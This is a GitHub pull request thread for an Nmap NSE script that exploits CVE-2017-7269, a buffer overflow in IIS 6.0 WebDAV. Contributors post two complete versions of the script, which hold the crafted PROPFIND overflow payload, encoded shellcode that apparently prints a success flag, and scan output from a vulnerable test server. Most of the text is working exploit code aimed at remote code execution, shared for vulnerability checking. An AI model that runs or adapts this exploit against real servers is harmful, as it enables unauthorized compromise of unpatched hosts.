
NSE script for exploiting BOF in IIS (CVE-2017-7269) #828

Open: wants to merge 6 commits into base: master

Conversation

@rewanthtammana (Contributor) commented Apr 5, 2017

Developed NSE script for exploiting CVE-2017-7269, a Buffer Overflow vulnerability in Microsoft IIS 6.0 and Microsoft Windows Server 2003 R2.

@rewanthtammana rewanthtammana changed the title NSE script for BOF in IIS (CVE-2017-7269) NSE script for exploiting BOF in IIS (CVE-2017-7269) Apr 5, 2017
@fakenine

Hello, your script does not compile in nmap 7.60

Starting Nmap 7.60 ( https://nmap.org ) at 2018-10-19 10:09 CEST
NSE: Updating rule database.
NSE: failed to initialize the script engine:
/usr/bin/../share/nmap/nse_main.lua:259: /usr/bin/../share/nmap/scripts//iis-buffer-overflow.nse:165: unexpected symbol near '='
stack traceback:
	[C]: in function 'assert'
	/usr/bin/../share/nmap/nse_main.lua:259: in upvalue 'loadscript'
	/usr/bin/../share/nmap/nse_main.lua:601: in field 'new'
	/usr/bin/../share/nmap/nse_main.lua:1296: in main chunk
	[C]: in ?

QUITTING!

@fakenine left a comment

I've added comments to fix the compile errors

(3 review comments on scripts/iis-buffer-overflow.nse, now outdated and resolved)
@fakenine

Hello @rewanth1997, I've set up some Windows Server 2003 instances on AWS (dated from 2015) with IIS V6.0 installed to test your script, but I have not been able to have nmap successfully find the vulnerability.

Could you please provide more context on how you tested this?

@rewanthtammana (Contributor, Author) commented Oct 26, 2018

Hi @fakenine,
Thanks for working on this PR. Can you please share more details with me on the architecture of your AWS instance? It would be better if we can use Twitter/Telegram/other social networks to discuss your setup further. It's better not to flood the PR with discussion comments.

I pinged you on Twitter & Hangouts. If you aren't comfortable with either of them, please share your preferred platform with me for more discussion.

@tarraschk

Hello,

I work with @fakenine .

I noticed that you had made a custom shell payload focusing on the HTTP code sent by the targeted machine.

The payload from this repo is actually quite good as it echoes "CVE-2017-7269" on vulnerable machines https://github.com/lcatro/CVE-2017-7269-Echo-PoC.

I adapted this payload in the embedded script here:

local nmap = require "nmap"
local string = require "string"
local shortport = require "shortport"
local vulns = require "vulns"

-- NSE Buffer Overflow vulnerability in IIS

---
-- @usage
-- nmap -p 80 --script iis-buffer-overflow <target>
--
-- @output
-- PORT   STATE  SERVICE
-- 80/tcp open   http
-- |  iis-buffer-overflow:
-- |    VULNERABLE: Buffer Overflow in IIS 6 and Windows Server 2003 R2
-- |       State: VULNERABLE (Exploitable)
-- |       Risk factor: High CVSS: 10.0
-- |       Description:
-- |         Buffer overflow in the ScStoragePathFromUrl function in the WebDAV
-- |         service in Internet Information Services (IIS) 6.0
-- |         in Microsoft Windows Server 2003 R2 allows remote attackers to execute
-- |         arbitrary code via a long header beginning with "If: <http://" in a
-- |         PROPFIND request, as exploited in the wild in July or August 2016.
-- |
-- |         Original exploit by Zhiniang Peng and Chen Wu.
-- |
-- |    References:
-- |     https://github.com/edwardz246003/IIS_exploit,
-- |     https://github.com/lcatro/CVE-2017-7269-Echo-PoC,
-- |_    https://0patch.blogspot.in/2017/03/0patching-immortal-cve-2017-7269.html
--

author = {
  "Zhiniang Peng",       -- Original author
  "Chen Wu",             -- Original author
  "LCatro",              -- Exploit author
  "Rewanth Cool",        -- NSE script author
  "Samy Kacimi",         -- NSE script contributor
  "Maxime Alay-Eddine"   -- NSE script contributor
}
license = "Same as Nmap--See https://nmap.org/book/man-legal.html"
categories = {"exploit", "vuln", "intrusive"}

portrule = shortport.portnumber(80, "tcp")

action = function(host, port)
  local socket, response, try, catch, payload, shellcode, vulnerable_name

  local vuln_report = vulns.Report:new(SCRIPT_NAME, host, port)
  local vuln = {
    title = 'Buffer Overflow in IIS 6 and Windows Server 2003 R2',
    state = vulns.STATE.NOT_VULN,
    risk_factor = "High",
    description = [[
Buffer overflow in the ScStoragePathFromUrl function in the WebDAV service in Internet Information Services (IIS) 6.0
in Microsoft Windows Server 2003 R2 allows remote attackers to execute arbitrary code via a long header beginning
with "If: <http://" in a PROPFIND request, as exploited in the wild in July or August 2016.

Original exploit by Zhiniang Peng and Chen Wu.
    ]],
    IDS = {
      CVE = 'CVE-2017-7269'
    },
    scores = {
      CVSS = '10.0'
    },
    references = {
      'https://github.com/edwardz246003/IIS_exploit',
      'https://0patch.blogspot.in/2017/03/0patching-immortal-cve-2017-7269.html'
    },
    dates = {
      disclosure = {year = '2017', month = '03', day = '26'},
    }
  }

  -- If domain name doesn't exist this line of code takes ip into consideration
  vulnerable_name = host.targetname or host.ip

  socket = nmap.new_socket("tcp")
  socket:set_timeout(10000)
  catch = function()
    socket:close()
  end

  try = nmap.new_try(catch)
  try(socket:connect(host, port, "tcp"))

  -- Crafting the payload by parts

  -- Crafting the request with HTTP PROPFIND method
  payload = 'PROPFIND / HTTP/1.1\r\nHost: localhost\r\nContent-Length: 0\r\n'
  payload = payload .. 'If: <http://localhost/aaaaaaa'

  -- Random text added to payload (Can be modified only for experimental purposes)
  payload = payload .. '\xe6\xbd\xa8\xe7\xa1\xa3\xe7\x9d\xa1\xe7\x84\xb3\xe6\xa4\xb6\xe4\x9d\xb2\xe7\xa8\xb9\xe4\xad\xb7\xe4\xbd'
  payload = payload .. '\xb0\xe7\x95\x93\xe7\xa9\x8f\xe4\xa1\xa8\xe5\x99\xa3\xe6\xb5\x94\xe6\xa1\x85\xe3\xa5\x93\xe5\x81\xac\xe5'
  payload = payload .. '\x95\xa7\xe6\x9d\xa3\xe3\x8d\xa4\xe4\x98\xb0\xe7\xa1\x85\xe6\xa5\x92\xe5\x90\xb1\xe4\xb1\x98\xe6\xa9\x91'
  payload = payload .. '\xe7\x89\x81\xe4\x88\xb1\xe7\x80\xb5\xe5\xa1\x90\xe3\x99\xa4\xe6\xb1\x87\xe3\x94\xb9\xe5\x91\xaa\xe5\x80'
  payload = payload .. '\xb4\xe5\x91\x83\xe7\x9d\x92\xe5\x81\xa1\xe3\x88\xb2\xe6\xb5\x8b\xe6\xb0\xb4\xe3\x89\x87\xe6\x89\x81\xe3'
  payload = payload .. '\x9d\x8d\xe5\x85\xa1\xe5\xa1\xa2\xe4\x9d\xb3\xe5\x89\x90\xe3\x99\xb0\xe7\x95\x84\xe6\xa1\xaa\xe3\x8d\xb4'
  payload = payload .. '\xe4\xb9\x8a\xe7\xa1\xab\xe4\xa5\xb6\xe4\xb9\xb3\xe4\xb1\xaa\xe5\x9d\xba\xe6\xbd\xb1\xe5\xa1\x8a\xe3\x88'
  payload = payload .. '\xb0\xe3\x9d\xae\xe4\xad\x89\xe5\x89\x8d\xe4\xa1\xa3\xe6\xbd\x8c\xe7\x95\x96\xe7\x95\xb5\xe6\x99\xaf\xe7'
  payload = payload .. '\x99\xa8\xe4\x91\x8d\xe5\x81\xb0\xe7\xa8\xb6\xe6\x89\x8b\xe6\x95\x97\xe7\x95\x90\xe6\xa9\xb2\xe7\xa9\xab'
  payload = payload .. '\xe7\x9d\xa2\xe7\x99\x98\xe6\x89\x88\xe6\x94\xb1\xe3\x81\x94\xe6\xb1\xb9\xe5\x81\x8a\xe5\x91\xa2\xe5\x80'
  payload = payload .. '\xb3\xe3\x95\xb7'

  -- Main payload (Do not edit this part)
  payload = payload .. '\xe6\xa9\xb7\xe4\x85\x84\xe3\x8c\xb4\xe6\x91\xb6\xe4\xb5\x86\xe5\x99\x94\xe4\x9d\xac\xe6'
  payload = payload .. '\x95\x83\xe7\x98\xb2\xe7\x89\xb8\xe5\x9d\xa9\xe4\x8c\xb8\xe6\x89\xb2\xe5\xa8\xb0\xe5\xa4\xb8\xe5\x91\x88'
  payload = payload .. '\xc8\x82\xc8\x82\xe1\x8b\x80\xe6\xa0\x83\xe6\xb1\x84\xe5\x89\x96\xe4\xac\xb7\xe6\xb1\xad\xe4\xbd\x98\xe5'
  payload = payload .. '\xa1\x9a\xe7\xa5\x90\xe4\xa5\xaa\xe5\xa1\x8f\xe4\xa9\x92\xe4\x85\x90\xe6\x99\x8d\xe1\x8f\x80\xe6\xa0\x83'
  payload = payload .. '\xe4\xa0\xb4\xe6\x94\xb1\xe6\xbd\x83\xe6\xb9\xa6\xe7\x91\x81\xe4\x8d\xac\xe1\x8f\x80\xe6\xa0\x83\xe5\x8d'
  payload = payload .. '\x83\xe6\xa9\x81\xe7\x81\x92\xe3\x8c\xb0\xe5\xa1\xa6\xe4\x89\x8c\xe7\x81\x8b\xe6\x8d\x86\xe5\x85\xb3\xe7'
  payload = payload .. '\xa5\x81\xe7\xa9\x90\xe4\xa9\xac'

  payload = payload .. '>'
  payload = payload .. ' (Not <locktoken:write1>) <http://localhost/bbbbbbb'

  -- Random text added to payload (Can be modified only for experimental purposes)
  payload = payload .. '\xe7\xa5\x88\xe6\x85\xb5\xe4\xbd\x83\xe6\xbd\xa7\xe6\xad\xaf\xe4\xa1\x85\xe3\x99\x86\xe6'
  payload = payload .. '\x9d\xb5\xe4\x90\xb3\xe3\xa1\xb1\xe5\x9d\xa5\xe5\xa9\xa2\xe5\x90\xb5\xe5\x99\xa1\xe6\xa5\x92\xe6\xa9\x93\xe5'
  payload = payload .. '\x85\x97\xe3\xa1\x8e\xe5\xa5\x88\xe6\x8d\x95\xe4\xa5\xb1\xe4\x8d\xa4\xe6\x91\xb2\xe3\x91\xa8\xe4\x9d\x98\xe7'
  payload = payload .. '\x85\xb9\xe3\x8d\xab\xe6\xad\x95\xe6\xb5\x88\xe5\x81\x8f\xe7\xa9\x86\xe3\x91\xb1\xe6\xbd\x94\xe7\x91\x83\xe5'
  payload = payload .. '\xa5\x96\xe6\xbd\xaf\xe7\x8d\x81\xe3\x91\x97\xe6\x85\xa8\xe7\xa9\xb2\xe3\x9d\x85\xe4\xb5\x89\xe5\x9d\x8e\xe5'
  payload = payload .. '\x91\x88\xe4\xb0\xb8\xe3\x99\xba\xe3\x95\xb2\xe6\x89\xa6\xe6\xb9\x83\xe4\xa1\xad\xe3\x95\x88\xe6\x85\xb7\xe4'
  payload = payload .. '\xb5\x9a\xe6\x85\xb4\xe4\x84\xb3\xe4\x8d\xa5\xe5\x89\xb2\xe6\xb5\xa9\xe3\x99\xb1\xe4\xb9\xa4\xe6\xb8\xb9\xe6'
  payload = payload .. '\x8d\x93\xe6\xad\xa4\xe5\x85\x86\xe4\xbc\xb0\xe7\xa1\xaf\xe7\x89\x93\xe6\x9d\x90\xe4\x95\x93\xe7\xa9\xa3\xe7'
  payload = payload .. '\x84\xb9\xe4\xbd\x93\xe4\x91\x96\xe6\xbc\xb6\xe7\x8d\xb9\xe6\xa1\xb7\xe7\xa9\x96\xe6\x85\x8a\xe3\xa5\x85\xe3'
  payload = payload .. '\x98\xb9\xe6\xb0\xb9\xe4\x94\xb1\xe3\x91\xb2\xe5\x8d\xa5\xe5\xa1\x8a\xe4\x91\x8e\xe7\xa9\x84\xe6\xb0\xb5'

  -- Main payload (Do not edit this part)
  payload = payload .. '\xe5\xa9\x96\xe6\x89\x81\xe6\xb9\xb2\xe6\x98\xb1\xe5\xa5\x99\xe5\x90\xb3\xe3\x85\x82\xe5\xa1\xa5\xe5\xa5\x81\xe7'
  payload = payload .. '\x85\x90\xe3\x80\xb6\xe5\x9d\xb7\xe4\x91\x97\xe5\x8d\xa1\xe1\x8f\x80\xe6\xa0\x83\xe6\xb9\x8f\xe6\xa0\x80\xe6'
  payload = payload .. '\xb9\x8f\xe6\xa0\x80\xe4\x89\x87\xe7\x99\xaa\xe1\x8f\x80\xe6\xa0\x83\xe4\x89\x97\xe4\xbd\xb4\xe5\xa5\x87\xe5'
  payload = payload .. '\x88\xb4\xe4\xad\xa6\xe4\xad\x82\xe7\x91\xa4\xe7\xa1\xaf\xe6\x82\x82\xe6\xa0\x81\xe5\x84\xb5\xe7\x89\xba\xe7'
  payload = payload .. '\x91\xba\xe4\xb5\x87\xe4\x91\x99\xe5\x9d\x97\xeb\x84\x93\xe6\xa0\x80\xe3\x85\xb6\xe6\xb9\xaf\xe2\x93\xa3\xe6'
  payload = payload .. '\xa0\x81\xe1\x91\xa0\xe6\xa0\x83\xcc\x80\xe7\xbf\xbe\xef\xbf\xbf\xef\xbf\xbf\xe1\x8f\x80\xe6\xa0\x83\xd1\xae'
  payload = payload .. '\xe6\xa0\x83\xe7\x85\xae\xe7\x91\xb0\xe1\x90\xb4\xe6\xa0\x83\xe2\xa7\xa7\xe6\xa0\x81\xe9\x8e\x91\xe6\xa0\x80'
  payload = payload .. '\xe3\xa4\xb1\xe6\x99\xae\xe4\xa5\x95\xe3\x81\x92\xe5\x91\xab\xe7\x99\xab\xe7\x89\x8a\xe7\xa5\xa1\xe1\x90\x9c'
  payload = payload .. '\xe6\xa0\x83\xe6\xb8\x85\xe6\xa0\x80\xe7\x9c\xb2\xe7\xa5\xa8\xe4\xb5\xa9\xe3\x99\xac\xe4\x91\xa8\xe4\xb5\xb0'
  payload = payload .. '\xe8\x89\x86\xe6\xa0\x80\xe4\xa1\xb7\xe3\x89\x93\xe1\xb6\xaa\xe6\xa0\x82\xe6\xbd\xaa\xe4\x8c\xb5\xe1\x8f\xb8'
  payload = payload .. '\xe6\xa0\x83\xe2\xa7\xa7\xe6\xa0\x81'

  -- Shellcode
  shellcode = 'VVYA4444444444QATAXAZAPA3QADAZABARALAYAIAQAIAQAPA5AAAPAZ1AI1AIAIAJ11AIAIAXA58AAPAZABABQI1AIQIAIQI1111AIAJQI1AYAZBABABA'
  shellcode = shellcode .. 'BAB30APB944JBRDDKLMN8KPM0KP4KOYM4CQJIOPKSKPKPTKLITKKQDKU0G0KPKPM00QQXI8KPM0M0K8KPKPKPM0QNTKKNU397N30WRJLMSSI7LNR72JPTK'
  shellcode = shellcode .. 'OXPZKQH0CR615NMNRP0NQNWNMOGP206NYKPOSRORN3D35RND4NMPTD9RP2ENZMPT4352XCDNOS8BTBMBLLMKZOSROBN441URNT4NMPL2ERNS7SDBHOJOBN'
  shellcode = shellcode .. 'VO0LMLJLMKZ0HOXOY0TO0OS260ENMNRP0NQOGNMOGOB06OIMP2345RCS3RET3D3M0KLK8SRM0KPM0C0SYK5NQWP2DDK0PNP4KQBLLTKQBMDDKD2MXLOGG0'
  shellcode = shellcode .. 'JO6NQKO6LOLQQSLKRNLMP7QXOLMM18G9RJRR2R74KQBLP4K0JOL4K0LN1RXK3PHKQHQ0Q4K29MPM19CTKQ9MH9SOJQ94KNTTKKQJ6P1KOFLY1XOLMKQXGN'
  shellcode = shellcode .. 'X9PD5KFM33MKHOKSMO42UJDPXTKB8O4KQIC1V4KLL0K4K0XMLKQXSTKKTTKKQJ0CYQ4O4MTQKQK1QR90Z0QKOYPQOQOQJ4KLRJKTM1MWKOWMCBR2OQZKPP'
  shellcode = shellcode .. 'SKOYEKPA'

  payload = payload .. shellcode
  payload = payload .. '>\r\n\r\n'

  -- Exploiting the vulnerability
  try(socket:send(payload))

  -- We receive a 200 response if the payload succeeds.
  response = try(socket:receive_bytes(80960))
  socket:close()
  
  -- Checking for flag in the response
  local flag = 'HHIT CVE%-2017%-7269 Success'
  
  if string.match(response, flag) then
    vuln.state = vulns.STATE.EXPLOIT
    vuln.exploit_results = response
  end

  return vuln_report:make_output(vuln)

end

Please do not hesitate if you want us to chat with Hangout or Telegram.

@rewanthtammana (Contributor, Author)

Hi @fakenine @tarraschk,

There is one more major issue in the above code. The PROPFIND request contains only http://localhost/ in the code. If the IIS server is running on a port other than 80, like 81, 8080, 8081, etc., then the above script won't be able to yield positive results.

@rewanthtammana (Contributor, Author)

For more insights on this fix check my PR on lcatro/CVE-2017-7269-Echo-PoC#4. Please fix this part and resend the code.

@tarraschk commented Nov 2, 2018

Done.

local nmap = require "nmap"
local string = require "string"
local shortport = require "shortport"
local vulns = require "vulns"

-- NSE Buffer Overflow vulnerability in IIS

---
-- @usage
-- nmap --script iis-buffer-overflow <target>
--
-- @output
-- PORT   STATE  SERVICE
-- 80/tcp open   http
-- |  iis-buffer-overflow:
-- |    VULNERABLE: Buffer Overflow in IIS 6 and Windows Server 2003 R2
-- |       State: VULNERABLE (Exploitable)
-- |       Risk factor: High CVSS: 10.0
-- |       Description:
-- |         Buffer overflow in the ScStoragePathFromUrl function in the WebDAV
-- |         service in Internet Information Services (IIS) 6.0
-- |         in Microsoft Windows Server 2003 R2 allows remote attackers to execute
-- |         arbitrary code via a long header beginning with "If: <http://" in a
-- |         PROPFIND request, as exploited in the wild in July or August 2016.
-- |
-- |         Original exploit by Zhiniang Peng and Chen Wu.
-- |
-- |    References:
-- |     https://github.com/edwardz246003/IIS_exploit,
-- |     https://github.com/lcatro/CVE-2017-7269-Echo-PoC,
-- |_    https://0patch.blogspot.in/2017/03/0patching-immortal-cve-2017-7269.html
--

author = {
  "Zhiniang Peng",       -- Original author
  "Chen Wu",             -- Original author
  "LCatro",              -- Exploit author
  "Rewanth Cool",        -- NSE script author
  "Samy Kacimi",         -- NSE script contributor
  "Maxime Alay-Eddine"   -- NSE script contributor
}
license = "Same as Nmap--See https://nmap.org/book/man-legal.html"
categories = {"exploit", "vuln", "intrusive"}

portrule = shortport.http

action = function(host, port)
  local socket, response, try, catch, payload, shellcode, vulnerable_name

  local vuln_report = vulns.Report:new(SCRIPT_NAME, host, port)
  local vuln = {
    title = 'Buffer Overflow in IIS 6 and Windows Server 2003 R2',
    state = vulns.STATE.NOT_VULN,
    risk_factor = "High",
    description = [[
Buffer overflow in the ScStoragePathFromUrl function in the WebDAV service in Internet Information Services (IIS) 6.0
in Microsoft Windows Server 2003 R2 allows remote attackers to execute arbitrary code via a long header beginning
with "If: <http://" in a PROPFIND request, as exploited in the wild in July or August 2016.

Original exploit by Zhiniang Peng and Chen Wu.
    ]],
    IDS = {
      CVE = 'CVE-2017-7269'
    },
    scores = {
      CVSS = '10.0'
    },
    references = {
      'https://github.com/edwardz246003/IIS_exploit',
      'https://0patch.blogspot.in/2017/03/0patching-immortal-cve-2017-7269.html'
    },
    dates = {
      disclosure = {year = '2017', month = '03', day = '26'},
    }
  }

  -- If domain name doesn't exist this line of code takes ip into consideration
  vulnerable_name = host.targetname or host.ip

  socket = nmap.new_socket("tcp")
  socket:set_timeout(10000)
  catch = function()
    socket:close()
  end

  try = nmap.new_try(catch)
  try(socket:connect(host, port, "tcp"))

  -- Crafting the payload by parts

  -- Crafting the request with HTTP PROPFIND method
  payload = 'PROPFIND / HTTP/1.1\r\nHost: localhost:' .. port.number .. '\r\nContent-Length: 0\r\n'
  payload = payload .. 'If: <http://localhost:' .. port.number .. '/aaaaaaa'

  -- Random text added to payload (Can be modified only for experimental purposes)
  payload = payload .. '\xe6\xbd\xa8\xe7\xa1\xa3\xe7\x9d\xa1\xe7\x84\xb3\xe6\xa4\xb6\xe4\x9d\xb2\xe7\xa8\xb9\xe4\xad\xb7\xe4\xbd'
  payload = payload .. '\xb0\xe7\x95\x93\xe7\xa9\x8f\xe4\xa1\xa8\xe5\x99\xa3\xe6\xb5\x94\xe6\xa1\x85\xe3\xa5\x93\xe5\x81\xac\xe5'
  payload = payload .. '\x95\xa7\xe6\x9d\xa3\xe3\x8d\xa4\xe4\x98\xb0\xe7\xa1\x85\xe6\xa5\x92\xe5\x90\xb1\xe4\xb1\x98\xe6\xa9\x91'
  payload = payload .. '\xe7\x89\x81\xe4\x88\xb1\xe7\x80\xb5\xe5\xa1\x90\xe3\x99\xa4\xe6\xb1\x87\xe3\x94\xb9\xe5\x91\xaa\xe5\x80'
  payload = payload .. '\xb4\xe5\x91\x83\xe7\x9d\x92\xe5\x81\xa1\xe3\x88\xb2\xe6\xb5\x8b\xe6\xb0\xb4\xe3\x89\x87\xe6\x89\x81\xe3'
  payload = payload .. '\x9d\x8d\xe5\x85\xa1\xe5\xa1\xa2\xe4\x9d\xb3\xe5\x89\x90\xe3\x99\xb0\xe7\x95\x84\xe6\xa1\xaa\xe3\x8d\xb4'
  payload = payload .. '\xe4\xb9\x8a\xe7\xa1\xab\xe4\xa5\xb6\xe4\xb9\xb3\xe4\xb1\xaa\xe5\x9d\xba\xe6\xbd\xb1\xe5\xa1\x8a\xe3\x88'
  payload = payload .. '\xb0\xe3\x9d\xae\xe4\xad\x89\xe5\x89\x8d\xe4\xa1\xa3\xe6\xbd\x8c\xe7\x95\x96\xe7\x95\xb5\xe6\x99\xaf\xe7'
  payload = payload .. '\x99\xa8\xe4\x91\x8d\xe5\x81\xb0\xe7\xa8\xb6\xe6\x89\x8b\xe6\x95\x97\xe7\x95\x90\xe6\xa9\xb2\xe7\xa9\xab'
  payload = payload .. '\xe7\x9d\xa2\xe7\x99\x98\xe6\x89\x88\xe6\x94\xb1\xe3\x81\x94\xe6\xb1\xb9\xe5\x81\x8a\xe5\x91\xa2\xe5\x80'
  payload = payload .. '\xb3\xe3\x95\xb7'

  -- Main payload (Do not edit this part)
  payload = payload .. '\xe6\xa9\xb7\xe4\x85\x84\xe3\x8c\xb4\xe6\x91\xb6\xe4\xb5\x86\xe5\x99\x94\xe4\x9d\xac\xe6'
  payload = payload .. '\x95\x83\xe7\x98\xb2\xe7\x89\xb8\xe5\x9d\xa9\xe4\x8c\xb8\xe6\x89\xb2\xe5\xa8\xb0\xe5\xa4\xb8\xe5\x91\x88'
  payload = payload .. '\xc8\x82\xc8\x82\xe1\x8b\x80\xe6\xa0\x83\xe6\xb1\x84\xe5\x89\x96\xe4\xac\xb7\xe6\xb1\xad\xe4\xbd\x98\xe5'
  payload = payload .. '\xa1\x9a\xe7\xa5\x90\xe4\xa5\xaa\xe5\xa1\x8f\xe4\xa9\x92\xe4\x85\x90\xe6\x99\x8d\xe1\x8f\x80\xe6\xa0\x83'
  payload = payload .. '\xe4\xa0\xb4\xe6\x94\xb1\xe6\xbd\x83\xe6\xb9\xa6\xe7\x91\x81\xe4\x8d\xac\xe1\x8f\x80\xe6\xa0\x83\xe5\x8d'
  payload = payload .. '\x83\xe6\xa9\x81\xe7\x81\x92\xe3\x8c\xb0\xe5\xa1\xa6\xe4\x89\x8c\xe7\x81\x8b\xe6\x8d\x86\xe5\x85\xb3\xe7'
  payload = payload .. '\xa5\x81\xe7\xa9\x90\xe4\xa9\xac'

  payload = payload .. '>'
  payload = payload .. ' (Not <locktoken:write1>) <http://localhost:' .. port.number .. '/bbbbbbb'

  -- Random text added to payload (Can be modified only for experimental purposes)
  payload = payload .. '\xe7\xa5\x88\xe6\x85\xb5\xe4\xbd\x83\xe6\xbd\xa7\xe6\xad\xaf\xe4\xa1\x85\xe3\x99\x86\xe6'
  payload = payload .. '\x9d\xb5\xe4\x90\xb3\xe3\xa1\xb1\xe5\x9d\xa5\xe5\xa9\xa2\xe5\x90\xb5\xe5\x99\xa1\xe6\xa5\x92\xe6\xa9\x93\xe5'
  payload = payload .. '\x85\x97\xe3\xa1\x8e\xe5\xa5\x88\xe6\x8d\x95\xe4\xa5\xb1\xe4\x8d\xa4\xe6\x91\xb2\xe3\x91\xa8\xe4\x9d\x98\xe7'
  payload = payload .. '\x85\xb9\xe3\x8d\xab\xe6\xad\x95\xe6\xb5\x88\xe5\x81\x8f\xe7\xa9\x86\xe3\x91\xb1\xe6\xbd\x94\xe7\x91\x83\xe5'
  payload = payload .. '\xa5\x96\xe6\xbd\xaf\xe7\x8d\x81\xe3\x91\x97\xe6\x85\xa8\xe7\xa9\xb2\xe3\x9d\x85\xe4\xb5\x89\xe5\x9d\x8e\xe5'
  payload = payload .. '\x91\x88\xe4\xb0\xb8\xe3\x99\xba\xe3\x95\xb2\xe6\x89\xa6\xe6\xb9\x83\xe4\xa1\xad\xe3\x95\x88\xe6\x85\xb7\xe4'
  payload = payload .. '\xb5\x9a\xe6\x85\xb4\xe4\x84\xb3\xe4\x8d\xa5\xe5\x89\xb2\xe6\xb5\xa9\xe3\x99\xb1\xe4\xb9\xa4\xe6\xb8\xb9\xe6'
  payload = payload .. '\x8d\x93\xe6\xad\xa4\xe5\x85\x86\xe4\xbc\xb0\xe7\xa1\xaf\xe7\x89\x93\xe6\x9d\x90\xe4\x95\x93\xe7\xa9\xa3\xe7'
  payload = payload .. '\x84\xb9\xe4\xbd\x93\xe4\x91\x96\xe6\xbc\xb6\xe7\x8d\xb9\xe6\xa1\xb7\xe7\xa9\x96\xe6\x85\x8a\xe3\xa5\x85\xe3'
  payload = payload .. '\x98\xb9\xe6\xb0\xb9\xe4\x94\xb1\xe3\x91\xb2\xe5\x8d\xa5\xe5\xa1\x8a\xe4\x91\x8e\xe7\xa9\x84\xe6\xb0\xb5'

  -- Main payload (Do not edit this part)
  payload = payload .. '\xe5\xa9\x96\xe6\x89\x81\xe6\xb9\xb2\xe6\x98\xb1\xe5\xa5\x99\xe5\x90\xb3\xe3\x85\x82\xe5\xa1\xa5\xe5\xa5\x81\xe7'
  payload = payload .. '\x85\x90\xe3\x80\xb6\xe5\x9d\xb7\xe4\x91\x97\xe5\x8d\xa1\xe1\x8f\x80\xe6\xa0\x83\xe6\xb9\x8f\xe6\xa0\x80\xe6'
  payload = payload .. '\xb9\x8f\xe6\xa0\x80\xe4\x89\x87\xe7\x99\xaa\xe1\x8f\x80\xe6\xa0\x83\xe4\x89\x97\xe4\xbd\xb4\xe5\xa5\x87\xe5'
  payload = payload .. '\x88\xb4\xe4\xad\xa6\xe4\xad\x82\xe7\x91\xa4\xe7\xa1\xaf\xe6\x82\x82\xe6\xa0\x81\xe5\x84\xb5\xe7\x89\xba\xe7'
  payload = payload .. '\x91\xba\xe4\xb5\x87\xe4\x91\x99\xe5\x9d\x97\xeb\x84\x93\xe6\xa0\x80\xe3\x85\xb6\xe6\xb9\xaf\xe2\x93\xa3\xe6'
  payload = payload .. '\xa0\x81\xe1\x91\xa0\xe6\xa0\x83\xcc\x80\xe7\xbf\xbe\xef\xbf\xbf\xef\xbf\xbf\xe1\x8f\x80\xe6\xa0\x83\xd1\xae'
  payload = payload .. '\xe6\xa0\x83\xe7\x85\xae\xe7\x91\xb0\xe1\x90\xb4\xe6\xa0\x83\xe2\xa7\xa7\xe6\xa0\x81\xe9\x8e\x91\xe6\xa0\x80'
  payload = payload .. '\xe3\xa4\xb1\xe6\x99\xae\xe4\xa5\x95\xe3\x81\x92\xe5\x91\xab\xe7\x99\xab\xe7\x89\x8a\xe7\xa5\xa1\xe1\x90\x9c'
  payload = payload .. '\xe6\xa0\x83\xe6\xb8\x85\xe6\xa0\x80\xe7\x9c\xb2\xe7\xa5\xa8\xe4\xb5\xa9\xe3\x99\xac\xe4\x91\xa8\xe4\xb5\xb0'
  payload = payload .. '\xe8\x89\x86\xe6\xa0\x80\xe4\xa1\xb7\xe3\x89\x93\xe1\xb6\xaa\xe6\xa0\x82\xe6\xbd\xaa\xe4\x8c\xb5\xe1\x8f\xb8'
  payload = payload .. '\xe6\xa0\x83\xe2\xa7\xa7\xe6\xa0\x81'

  -- Shellcode
  shellcode = 'VVYA4444444444QATAXAZAPA3QADAZABARALAYAIAQAIAQAPA5AAAPAZ1AI1AIAIAJ11AIAIAXA58AAPAZABABQI1AIQIAIQI1111AIAJQI1AYAZBABABA'
  shellcode = shellcode .. 'BAB30APB944JBRDDKLMN8KPM0KP4KOYM4CQJIOPKSKPKPTKLITKKQDKU0G0KPKPM00QQXI8KPM0M0K8KPKPKPM0QNTKKNU397N30WRJLMSSI7LNR72JPTK'
  shellcode = shellcode .. 'OXPZKQH0CR615NMNRP0NQNWNMOGP206NYKPOSRORN3D35RND4NMPTD9RP2ENZMPT4352XCDNOS8BTBMBLLMKZOSROBN441URNT4NMPL2ERNS7SDBHOJOBN'
  shellcode = shellcode .. 'VO0LMLJLMKZ0HOXOY0TO0OS260ENMNRP0NQOGNMOGOB06OIMP2345RCS3RET3D3M0KLK8SRM0KPM0C0SYK5NQWP2DDK0PNP4KQBLLTKQBMDDKD2MXLOGG0'
  shellcode = shellcode .. 'JO6NQKO6LOLQQSLKRNLMP7QXOLMM18G9RJRR2R74KQBLP4K0JOL4K0LN1RXK3PHKQHQ0Q4K29MPM19CTKQ9MH9SOJQ94KNTTKKQJ6P1KOFLY1XOLMKQXGN'
  shellcode = shellcode .. 'X9PD5KFM33MKHOKSMO42UJDPXTKB8O4KQIC1V4KLL0K4K0XMLKQXSTKKTTKKQJ0CYQ4O4MTQKQK1QR90Z0QKOYPQOQOQJ4KLRJKTM1MWKOWMCBR2OQZKPP'
  shellcode = shellcode .. 'SKOYEKPA'

  payload = payload .. shellcode
  payload = payload .. '>\r\n\r\n'

  -- Exploiting the vulnerability
  try(socket:send(payload))

  -- We receive a 200 response if the payload succeeds.
  response = try(socket:receive_bytes(80960))
  socket:close()
  
  -- Checking for flag in the response
  local flag = 'HHIT CVE%-2017%-7269 Success'
  
  if string.match(response, flag) then
    vuln.state = vulns.STATE.EXPLOIT
    vuln.exploit_results = response
  end

  return vuln_report:make_output(vuln)

end

Could you please double check it on your side? I'd like to be sure that it works also on your side with your own vulnerable targeted machine.

Please also note that I changed the portrule to match any http-likely port.

@tarraschk

Just to prove that I tested the script, here are the results on a vulnerable machine:

Vulnerable machine with the port 80 exposed:

PORT     STATE SERVICE
80/tcp   open  http
| iis-buffer-overflow:
|   VULNERABLE:
|   Buffer Overflow in IIS 6 and Windows Server 2003 R2
|     State: VULNERABLE (Exploitable)
|     IDs:  CVE:CVE-2017-7269
|     Risk factor: High  CVSS: 10.0
|       Buffer overflow in the ScStoragePathFromUrl function in the WebDAV service in Internet Information Services (IIS) 6.0
|       in Microsoft Windows Server 2003 R2 allows remote attackers to execute arbitrary code via a long header beginning
|       with "If: <http://" in a PROPFIND request, as exploited in the wild in July or August 2016.
|
|       Original exploit by Zhiniang Peng and Chen Wu.
|
|     Disclosure date: 2017-03-26
|     Exploit results:
|       HTTP/1.1 200 OK
|   Connection: close
|   Date: Fri, 02 Nov 2018 17:12:57 GMT
|   Server: Microsoft-IIS/6.0
|   Content-Length:26
|
|   HHIT CVE-2017-7269 Success
|   CVE-2017-7269
